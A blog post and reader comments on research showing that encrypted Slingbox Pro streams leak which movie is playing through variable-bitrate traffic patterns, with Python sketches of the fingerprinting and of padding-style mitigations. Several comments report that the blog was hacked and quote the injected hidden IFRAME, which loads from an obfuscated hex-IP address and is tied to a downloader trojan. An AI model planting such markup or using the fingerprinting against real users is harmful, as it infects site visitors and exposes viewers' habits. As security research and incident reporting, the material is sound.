[Today’s guest blogger is Yoshi Kohno, a Computer Science prof at University of Washington who has done interesting work on security and privacy topics including e-voting. – Ed]
If you follow technology news, you might be aware of the buzz surrounding technologies that mate the Internet with your TV. The Slingbox Pro and the Apple TV are two commercial products leading this wave. The Slingbox Pro and the Apple TV system are a bit different, but the basic idea is that they can stream videos over a network. For example, you could hook the Slingbox Pro up to your DVD player or cable TV box, and then wirelessly watch a movie on any TV in your house (via the announced Sling Catcher). Or you could watch a movie or TV show on your laptop from across the world.
Privacy is important for these technologies. For example, you probably don’t want someone sniffing at your ISP to figure out that you’re watching a pirated copy of Spiderman 3 (of course, we don’t condone piracy). You might not want your neighbor, who likes to sniff 802.11 wireless packets, to be able to figure out what channel, movie, or type of movie you’re watching. You might not want your hotel to figure out what movie you’re watching on your laptop in order to send you targeted ads. The list goes on…
To address viewer privacy, the Slingbox Pro uses encryption. But does the use of encryption fully protect the privacy of a user’s viewing habits? We studied this question at the University of Washington, and we found that the answer to this question is No – despite the use of encryption, a passive eavesdropper can still learn private information about what someone is watching via their Slingbox Pro.
The full details of our results are in our Usenix Security 2007 paper, but here are some of the highlights.
First, in order to conserve bandwidth, the Slingbox Pro uses something called variable bitrate (VBR) encoding. VBR is a standard approach for compressing streaming multimedia. At a very abstract level, the idea is to only transmit the differences between frames. This means that if a scene changes rapidly, the Slingbox Pro must still transmit a lot of data. But if the scene changes slowly, the Slingbox Pro will only have to transmit a small amount of data – a great bandwidth saver.
Now notice that different movies have different visual effects (e.g., some movies have frequent and rapid scene changes, others don’t). The use of VBR encodings therefore means that the amount of data transmitted over time can serve as a fingerprint for a movie. And, since encryption alone won’t fully conceal the number of bytes transmitted, this fingerprint can survive encryption!
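To make the idea of a throughput fingerprint concrete, here is a minimal sketch of how an eavesdropper might turn observed packet sizes into a bytes-per-second trace. The function name, the one-second window, and the sample capture are all illustrative assumptions, not details taken from the paper.

```python
from collections import defaultdict

def throughput_trace(packets, window=1.0):
    """Sum observed bytes per fixed time window.

    packets: iterable of (timestamp_seconds, size_bytes) pairs, which an
    eavesdropper can record without decrypting anything.
    Returns one byte count per window, starting at the first packet.
    """
    packets = sorted(packets)
    if not packets:
        return []
    start = packets[0][0]
    buckets = defaultdict(int)
    for ts, size in packets:
        buckets[int((ts - start) // window)] += size
    return [buckets[i] for i in range(max(buckets) + 1)]

# Hypothetical capture: a busy scene followed by two quiet seconds.
capture = [(0.0, 1400), (0.2, 1400), (0.7, 1400), (1.1, 300), (2.5, 200)]
print(throughput_trace(capture))  # [4200, 300, 200]
```

Only timestamps and sizes are used, which is why encrypting the payload does not change the trace.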
We experimented with fingerprinting encrypted Slingbox Pro movie transmissions in our lab. We took 26 of our favorite movies (we tried to pick movies from the same director, or multiple movies in a series), and we played them over our Slingbox Pro. Sometimes we streamed them to a laptop attached to a wired network, and sometimes we streamed them to a laptop connected to an 802.11 wireless network. In all cases the laptop was one hop away.
We trained our system on some of those traces. We then took new query traces for these movies and tried to match them to our database. For over half of the movies, we were able to correctly identify the movie over 98% of the time. This is well above the less than 4% accuracy that one would get by random chance.
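As a rough illustration of the matching step, the sketch below compares a query trace against stored traces using Pearson correlation and picks the closest one. This is a stand-in technique chosen for brevity, not the algorithm from the paper, and the titles and byte counts are made up.

```python
import math

def pearson(a, b):
    """Pearson correlation of two traces, truncated to the shorter length."""
    n = min(len(a), len(b))
    a, b = a[:n], b[:n]
    mean_a, mean_b = sum(a) / n, sum(b) / n
    cov = sum((x - mean_a) * (y - mean_b) for x, y in zip(a, b))
    var_a = sum((x - mean_a) ** 2 for x in a)
    var_b = sum((y - mean_b) ** 2 for y in b)
    if var_a == 0 or var_b == 0:
        return 0.0  # a flat trace carries no shape to compare
    return cov / math.sqrt(var_a * var_b)

def best_match(query, database):
    """Return the title whose stored trace correlates best with the query."""
    return max(database, key=lambda title: pearson(query, database[title]))

# Hypothetical bytes-per-interval traces for two movies.
database = {
    "movie_a": [900, 880, 300, 310, 950, 920],
    "movie_b": [400, 420, 410, 900, 890, 400],
}
query = [850, 900, 280, 330, 1000, 870]  # noisy replay of movie_a
print(best_match(query, database))  # movie_a
print(f"random-guess baseline for 26 movies: {1 / 26:.1%}")  # 3.8%
```

The last line shows where the "less than 4%" baseline comes from: guessing uniformly among 26 movies is right about 3.8% of the time.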
What does all this mean? First and foremost, this research result provides further evidence that critical information can leak out through encrypted channels; see our paper for related work. In the case of encrypted streaming multimedia, one might wonder how our results scale since we only tested 26 movies. Addressing the scalability question for our new VBR-based fingerprinting approach is a subject of future research; but, as cryptanalysts like to say, attacks only get better. Moreover, if the makers of movies wanted to, they could potentially make the VBR fingerprints for their movies even stronger and more uniquely identifying.
(This note is not meant to criticize the makers of the Slingbox Pro. In fact, we were very pleased to learn that the Slingbox Pro uses encryption, which does raise the bar against a privacy attacker. Rather, this note describes new research results and fundamental challenges for privacy and streaming multimedia.)
I don’t think privacy has anything to do with the slingbox encryption. They did that to “protect” the content, otherwise the cable companies will sue them.
And perhaps the whole video is not encrypted. Only part of it may be. Because of the motion compensated nature of video, it may be possible for them to pass off with partial encryption.
Although I’m pleased to hear that Slingbox does use encryption (I just bought one myself), I think the guest blogger is missing the point. He raises two examples of where one “might not want someone sniffing” your Slingbox VBR packets in order to determine your viewing habits, whether legal or not-so-legal, via “fingerprints” based on VBR encoding rates, but he totally ignores whether that would be the best method of determining _what_ you are watching on your slingbox (or any future multimedia-streaming devices).
First, I’d raise the point that if someone is _that_ interested in your viewing habits to the point they are going to your ISP to capture your packets, you’ve probably got bigger problems than whether you are watching a pirated copy of Spiderman 3. Whoever has that much resource to devote to finding out your viewing habits probably could as easily bug your house, your computer, and/or the slingbox itself to determine what is being watched when, where, etc. The point being that a TLA that is devoting that much resource is not going to have to stoop to the level of capturing packets at the ISP level – there are far less intrusive and less detectable methods of determining what the subject (that is you) is doing at any given time. Telescoping mics and binoculars would be a start. Going up the TLA chain (say, NSA or NRO level), they probably could tempest either your slingbox, ethernet cable, internet connection, or your laptop without even having to break the so-called “broken encryption”.
Second, the “nosy neighbor” example is flawed as well. In order for the fingerprinting to work, one has to assume that the network-level transport has been broken (i.e., no 802.11 encryption), in order to be able to determine whether the packet going “over the wire (air)” is originating from the slingbox. If that isn’t done, then how is the attacker able to determine what packet(s) to base the VBR-decryption routine on? If you are connected to a “public hotspot” and streaming content (the point of whether that would violate the AUP of that hotspot notwithstanding), then you are, by conscious choice, making certain information available “to the public”. If I’m _that_ concerned with making sure that people aren’t privy to my slingbox habits, then I’d probably just set up a VPN tunnel to my router and stream it that way.
I don’t doubt that the paper raises a valid point – except I think the point is a non-issue. Either you are being “tracked” by a TLA resulting in a bigger implication, or you are running on an unsecured network that, by definition, allows certain information (IP header, TCP/UDP header, packet size) to be “made public” in order to make this attack feasible.
–sf
TEL – VBR does help in this instance as the Slingbox buffers about 10 seconds of content IIRC.
So if you have a maximum uplink from the slingbox of 500kbps, and your VBR stream peaks out at 700K but averages
woops – comment got sent before I finished it. Darn cat and mouse 🙂
Some simple mitigations to the problem in the Slingbox are:
(1) Allow other content to share the encrypted channel – e.g. provide a “VPN” channel via the remaining bandwidth, or just allow multiple channels to be sent.
(2) Utilize the large buffer capacity in PC-based video players (typically, your PC will tolerate video delivery time error more than 100x larger than your TV set-top box) by smoothing the VBR down with a “leaky bucket” bandwidth regulator. This would require a larger buffer capacity in the Slingbox, so they might not like it.
(3) A variant of 2: coarsely quantize the bitrate (e.g. send at 8 bitrates, switching every 0.25 second). This would significantly lower the information content of the covert channel with almost no impact on buffer capacity.
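Mitigations (2) and (3) can be sketched in a few lines. The code below is only an illustration under simple assumptions: time is divided into equal ticks, `leaky_bucket` caps what is sent per tick and queues the rest, and `quantize_up` pads each tick up to the nearest allowed level (padding upward is my assumption about how the quantization would be done). The sample numbers are made up.

```python
def leaky_bucket(arrivals, rate):
    """Send at most `rate` bytes per tick and queue the remainder.

    Returns (bytes_sent_per_tick, peak_backlog_in_bytes).
    """
    backlog, peak, sent = 0, 0, []
    for produced in arrivals:
        backlog += produced
        out = min(backlog, rate)
        backlog -= out
        sent.append(out)
        peak = max(peak, backlog)
    while backlog > 0:  # drain whatever is still queued at the end
        out = min(backlog, rate)
        backlog -= out
        sent.append(out)
    return sent, peak

def quantize_up(arrivals, levels):
    """Pad each tick up to the smallest allowed level that fits it."""
    levels = sorted(levels)
    padded = []
    for produced in arrivals:
        fitting = [level for level in levels if level >= produced]
        if not fitting:
            raise ValueError("tick exceeds the largest allowed level")
        padded.append(fitting[0])
    return padded

vbr = [100, 900, 200, 100, 800, 100]  # hypothetical bytes produced per tick
sent, peak = leaky_bucket(vbr, rate=400)
print(sent, peak)  # [100, 400, 400, 400, 400, 400, 100] 500
print(quantize_up(vbr, [250, 500, 1000]))  # [250, 1000, 250, 250, 1000, 250]
```

Note that the leaky bucket alone still shows a dip whenever the queue runs empty, and the quantized stream still reveals which level was used; both reduce the information in the trace rather than removing it.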
There’s been some discussion in the comments about VBR (variable bit rate) vs CBR (constant bit rate) security implications, and whether a device is “broken” if it can’t send CBR.
In the digital video distribution world (cable and satellite TV) VBR is often used to increase network channel density. The key idea is to multiplex multiple VBR channels together, trading off bandwidth and latency among them to fill a CBR “pipe”. To do this well, you need to be capable of fully re-encoding all the video channels, but you can get about 25% bit-rate malleability with pretty simple techniques.
If Slin
What I want to know is what kind of crappy encryption scheme is Slingbox using that reveals fingerprints like this?
I searched through the paper, but could not find this information anywhere. I think it would be extremely relevant to mention the encryption that Slingbox uses.
A real encryption cipher should be indistinguishable from random data, which the slingbox bitstream most certainly is not, the pattern is OVERWHELMING if you can do a successful known-ciphertext attack that works 98% of the time.
It looks like some sort of weak stream cipher, and according to the tech news it seems implemented solely to break compatibility with third-party vendors and to keep content providers happy.
It had been planned all along, but no announcement was made to the customers until after a firmware upgrade. The whole thing smacks of DRM a lot more than it does ‘consumer privacy’.
Client-side buffering should avoid any perceptible delay in response to instructions to “pause” or “rewind” regardless. With enough buffer-ahead even “fast forward” can be accommodated. “Skip chapter”, “Jump to bookmark”, etc. will incur the delay, but it’s more acceptable with those. A lot of DVD players already seem to “think” for a bit when those are used, before the result appears; probably because the drive has to seek a completely different region of the disc. People already tolerate it there.
I still stand by my original statement that any device unable to deliver a stream into the network at CONSTANT bit rate is a broken device.
In some situations, there would be no objection to a five-second delay between the time that video is fed into one end of the “pipe” and when it comes out the other. In those situations, bandwidth-smoothing techniques may be useful in combination with VBR. In other situations, such delays would be considered unacceptable. There’s really not much room for bandwidth smoothing if the maximum allowable delay is e.g. 50ms.
There is a huge difference between sending video between nodes on a LAN segment, and sending video between continents. Someone who uses a LAN to distribute video and remote control signals throughout his home is apt to be rather annoyed if there’s even a half-second delay between when he pushes a remote control button and when he sees the response. When sending data over a single LAN segment, keeping the delay under 50ms should not be a particular problem. The sender should be able to sense traffic levels on the network segment and act accordingly. The sender should also generally be able to assume that any packet that is successfully transmitted will be successfully received.
Sending data over a wide-area network is an entirely different matter. The sender has no way of knowing how much traffic exists on intervening network links, nor does it have any way of knowing whether a packet will reach its destination. The sender can’t even discover within a reasonable length of time whether a packet has reached the destination.
One approach to handling VBR encoding which might sometimes be useful over a WAN, but which might also be considered “piggish”, would be to encode video with a variable amount of forward error correction. In the “simple” parts of the video, forward-error correction might allow the video to play smoothly even if a third of the packets get dropped while in normal parts, only a 5% drop rate would be recoverable. In the most complex parts, any dropped packet would cause a visible disruption on playback.
Obviously one implication is that site compromise is no longer just for kicks or making a political statement, and no longer necessarily is accompanied by obvious defacement.
Another is that it’s not just disreputable sites you should avoid with IE and Javascript and scan anything there downloaded. It is all sites.
VBR encoding is a useful technique but VBR streaming is completely useless.
The term that crops up in the literature is “Bandwidth Smoothing”, there’s an article from 1999 which you can download from here — http://citeseer.ist.psu.edu/rexford99smoothing.html
The above article talks about how to calculate optimal playback buffer at the client side and the resulting startup latency caused by filling the buffer. If the transmitter has a full copy of the movie then it can do an exhaustive analysis and produce an optimised buffer length and CONSTANT bit rate transmission bandwidth to result in perfect viewing. However, the slingbox does not have access to the entire movie in advance so the best it can do is make a guess.
In any case, when VBR is used as the encoding technique, transmission should always be CBR and a client-side buffer makes up the difference. While there is lots of scope for arguing about optimising buffer size, and startup latency… there is no reason to ever use VBR as a transmission technique. From the point of view of network traffic analysis, every stream should look like a CBR stream (regardless of the encoding). I still stand by my original statement that any device unable to deliver a stream into the network at CONSTANT bit rate is a broken device. The technology for implementing bandwidth smoothing buffers is at least 10 years old.
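For the case where the sender knows the whole movie in advance, the startup latency needed for a given constant rate can be computed directly. The sketch below assumes a simplified model (one frame played per tick, `rate` bytes delivered per tick, integer byte counts); the function name and numbers are illustrative and not taken from the cited article.

```python
from itertools import accumulate

def min_startup_delay(frame_bytes, rate):
    """Smallest number of ticks to wait before playback so that, with
    `rate` bytes arriving per tick, every frame is complete on time.

    Frame i is played at tick delay + i, so the first i + 1 frames must
    fit into rate * (delay + i) bytes.
    """
    delay = 0
    for i, total in enumerate(accumulate(frame_bytes)):
        ticks_needed = -(-total // rate)  # ceiling division on integers
        delay = max(delay, ticks_needed - i)
    return delay

frames = [100, 900, 200, 100, 800, 100]  # hypothetical VBR frame sizes
print(min_startup_delay(frames, rate=400))   # 2
print(min_startup_delay(frames, rate=1000))  # 1
```

A lower constant rate costs more startup latency (and client buffer), which is the trade-off being argued over in this thread. A live source like the Slingbox cannot run this calculation, since it does not know future frame sizes.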
Ed: Sorry to hear you got haxored, what were the implications for anyone visiting the site and loading up the hostile code?
We’ve now learned that there was a problem at Dreamhost, our web hosting company. The badguys apparently broke in to Dreamhost and got access to many accounts.
You’re kidding. That’s a bit of a black eye for you — rather like a stealthy breakin at an alarm company or something.
There was an intrusion. We think the intruder exploited a bug in WordPress.
We did find the IFRAME on the site’s homepage as described above.
The hostile code has now been removed.
This is easy to settle. Perhaps a statement can be made as to whether the site was hacked and that code inserted, and that it has now been removed.
That code was at the bottom of the pages, immediately below the closing html tag.
Are you accusing Ed of something? Trying to hack your box?
I just examined the source of this page. The word “iframe” only occurs five times in the code — all of them in the text of your comments.
This IFRAME is also on the RSS page and breaks Sage RSS reader plugin for Firefox, because it is not valid XML.
try again:
*IFRAME src=’http://0xcb.0xdf.0x9e.0x0c/t’ width=’6′ height=’6′ style=’visibility: hidden;’*
*/IFRAME*
that code is as follows, asterisks replace the html brackets
IFRAME src=’http://0xcb.0xdf.0x9e.0x0c/t’ width=’6′ height=’6′ style=’visibility: hidden;’ /IFRAME
Something is a bit odd about this web page.
The following code appears on the pages:
which is triggering the MS warning about the remote data services add-on, and the site it refers to (probably in Malaysia) appears to be associated with a new version of the Downloader Trojan.
Beeker: The easiest way to check whether the data is encrypted traffic or simply an obfuscated form of a codec is to check whether the data “look random”, i.e. that it has roughly an even number of on and off bits. Encryption, if designed and used correctly, makes data look random/unstructured. Obviously, given that the paper showed they were able to fingerprint movies it didn’t work perfectly, but I’m sure that if the movies were unencrypted they would very much look structured.
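The "roughly even number of on and off bits" check is easy to try. The sketch below is only a rough illustration: `os.urandom` stands in for well-encrypted data and a repeated ASCII string stands in for structured data, both of which are my assumptions rather than real Slingbox traffic.

```python
import os

def ones_fraction(data: bytes) -> float:
    """Fraction of bits set to 1; close to 0.5 for random-looking data."""
    if not data:
        raise ValueError("need at least one byte")
    ones = sum(bin(byte).count("1") for byte in data)
    return ones / (len(data) * 8)

structured = b"AAAA header 0000 " * 200  # stand-in for unencrypted, structured data
random_like = os.urandom(4096)           # stand-in for properly encrypted data

print(f"structured:  {ones_fraction(structured):.3f}")
print(f"random-like: {ones_fraction(random_like):.3f}")
```

A balanced bit count is necessary but not sufficient: well-compressed data also looks close to random, so this test alone cannot tell an encrypted stream from a merely obfuscated compressed one.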
Dan: The paper’s introduction states that there is not a ‘Related Works’ section, but that they mention related work within each section. Probably the best approach, given that the paper covers three distinct topics. What was the reference you were wishing to share?
Tel: The reason VBR encoding works for media streaming is that they can tune it so that while they technically need to have the full bandwidth for any given movie, they actually have a very low probability of saturating the bandwidth at any given point in time.
Roland: Good point about the effect of shifting time within the media stream. As far as the network conditions being ideal, I think the paper did a good job explaining why they made their assumptions, i.e. they imagined the use case being home media consumption which would only involve one network hop, and by incorporating both wired and wireless traces they accounted for the differences in network behavior. I’m sure that if someone wanted to extend the results they could perform more extensive tracing with more varied network conditions to create a more informative fingerprint.
Interesting study. Tel makes a very good point about VBR being unsuitable in some ways for streaming: the pipe must be able to handle the most bursty part of the movie. What is confusing here is that VBR is used generally to drive down the total size of the media (same is true for VBR mp3). However, the data transmission of sequential VBR in real time gives the ability to fingerprint the movie.
However, the protocol could be enhanced so that during the less data-intensive part of the movie, data from the more intensive part of the movie, maybe many minutes away, can be downloaded and stored to be used later. This would require memory on the receiver side, but memory is only getting cheaper; even a 1GB flash would be more than enough. This could completely flatten the data stream so that it becomes unfingerprintable (further padding, while not bandwidth friendly, could take care of the rest). It can also take the edge off transmitting the higher data rate portions of the movie.
However this all starts to fall apart if you move into a channel hopping mode and you may end up downloading frames for a program or movie you don’t end up watching.
The tests were apparently performed under ideal, or at least nearly-identical, network conditions, with constant streaming from the beginning of the video clips, or for the same portion(s). The ‘fingerprints’ are going to vary in terms of the end-to-end network connections and the effect this has on the traffic characteristics, actions such as fast-forwarding, pausing, rewinding and so forth, as well as the section(s) of the video clip being viewed.
isn’t VBR variable bit rate here confused with progressive encoding ??
Tel, VBR does allow more effective network usage because drop outs and/or artifacts are acceptable a small part of the time. If you allow degradation of the visible image for 1 second per hour, you can cram in more movies/channels. Pushing 50% more channels through the same cables means 50% more income. VBR is big in the digital TV business.
Variable bitrate encoding does NOT save network bandwidth when doing media streaming.
If you think about it, suppose I want to lay a cable between two buildings such that it can handle “N” simultaneous movies. Each movie uses a peak bandwidth of “B” but VBR might reduce that to B/2 for 80% of the time. My cable still needs to carry N * B total bandwidth unless I want to start allowing random drop-outs for my viewers some percentage of the time. My bandwidth provisioning saves nothing whatsoever.
The best I can do is find a way to sell the extra bandwidth that the VBR is not using and make sure I sell it for applications that don’t care about dropouts and retries (e.g. email, file backup, etc). In practice, this “backfill” bandwidth is pretty much impossible to sell in the current environment.
My conclusion is that any device using VBR for a media streaming purpose is fundamentally broken. Note that VBR does save you storage bits on your hard drive and it also saves you bandwidth if you are going to download the movie first, then watch it later (i.e. if the realtime streaming constraint is removed from the traffic).
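The cable example above can be put into numbers. The sketch below computes how often total demand would exceed a given capacity if each of N streams needs B for 20% of the time and B/2 otherwise. It assumes the streams peak independently of each other, which is a strong assumption of mine and not something stated in the comment; the function name and N = 100 are likewise illustrative.

```python
from math import comb

def overflow_probability(n, capacity, peak=1.0, p_peak=0.2):
    """P(total demand > capacity) for n independent streams, each needing
    `peak` with probability p_peak and peak / 2 otherwise."""
    prob = 0.0
    for k in range(n + 1):  # k = number of streams at peak right now
        demand = k * peak + (n - k) * peak / 2
        if demand > capacity:
            prob += comb(n, k) * p_peak**k * (1 - p_peak) ** (n - k)
    return prob

n = 100
print(overflow_probability(n, capacity=100))  # 0.0: provisioning N * B never overflows
print(overflow_probability(n, capacity=75))   # small but nonzero: occasional drop-outs
```

Provisioning the full N * B gives zero drop-outs, as the comment says. Provisioning less trades bandwidth for a nonzero drop-out probability, and how small that probability is depends entirely on how independent the streams really are.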
That’s a slick bit of observation, and a fun set of results.
Have you considered the sort of matching algorithm used by Shazam for audio fingerprinting/matching? It seems natural for the problem. A good (if a little hand-wavey) introduction can be found in Wang’s “An Industrial Strength Audio Search Algorithm,” presented at ISMIR 2003. The real content starts about halfway through, if memory serves.
Could this technique be used to create the ever-elusive “unremovable fingerprint” that content protection companies are always trying to find?
Would it work the same for a TV show that the user paused, used FF, rewind, etc. I would think the fingerprint would change with those variables.. Or even if the user paused randomly during the movie playback..
Yoshi–does the conference version have a “related work” section? If so, I’ve got a reference for you to add…
It’s not clear to me that this attack will get better with a wider range of movies to choose from: as with gene-matching, you’ll probably find subpopulations with fingerprints more similar than a simple statistical model would suggest. (And as the sampling period approaches the length of the whole movie, you’d kinda expect to get very high accuracy.) It seems likely, though, that VBR fingerprints will be enough to identify the genre of movie being watched, and VBR patterns might even join average shot length as a quick quantitative measure of a movie’s pacing and visual style. Knowing any distinguishing characteristic would be sufficient for targeted ads.
At first glance it appears that pretty much all the methods for disguising VBR fingerprints involve either additional bandwidth or increased latency for the same image quality. In which environments will this be a problem?
How do you know the stream really is encrypted, and not just scrambled a bit? Let me throw up a hypothesis: The Slingbox stream is not really encrypted, they just changed something in the codec to make it incompatible with standard asf streams.
To quote more from the introduction of the paper:
“We test this algorithm on a dataset consisting of over 100 hours of network throughput data. With only 10 minutes worth of monitoring data, we are able to predict with 62% accuracy the movie that is being watched (on average over all movies); this compares favorably with the less than 4% accuracy that one would achieve by random chance. With 40 minutes worth of monitoring data, we are able to predict the movie with 77% accuracy. For certain movies we can do significantly better; for 15 out of the 26 movies, given a 40 minute trace we are able to predict the correct movie with over 98% accuracy….”
Further details of the experiments are in Section 2.3 of the paper.
Well, it’s true that once the fingerprint is established, you have something similar to a known plaintext attack. Granted, you still have to ‘crack’ both the encryption and the VBR codec at the same time, and the VBR codec is almost certainly lossy, so it’s not as close to being broken as you might think.
That said, this is fundamentally a form of traffic analysis, of being able to glean information based on whether or not something is being transmitted as opposed to the actual data being transmitted. The basic concepts have been known for many years now, and I believe are described in the rainbow series of books.
One method of correcting this is to send random data to fill in the space where nothing is being transmitted; that’s used for military systems. For this sort of system, it would be better to just accept higher latency in the data stream and average out the data flow by delaying data during high bit rate portions of the stream.
Interesting way to attack the scheme. Nitpick though: for half the movies you guessed 98% right? 1/13 =~ .077. Did you attack each movie stream multiple times? If so, how much data did you need to collect before an identification was possible? And how about the other 13 movies?
I just saw that and immediately “60% of the time, it works every time” popped into my head =).
I am not by any means a security expert, but it seems once the “finger print” is established, the encryption itself will soon be broken.
The US in WWII was able to break the Japanese code by transmitting fake unique messages and correctly linking them to intercepted Japanese radio transmissions.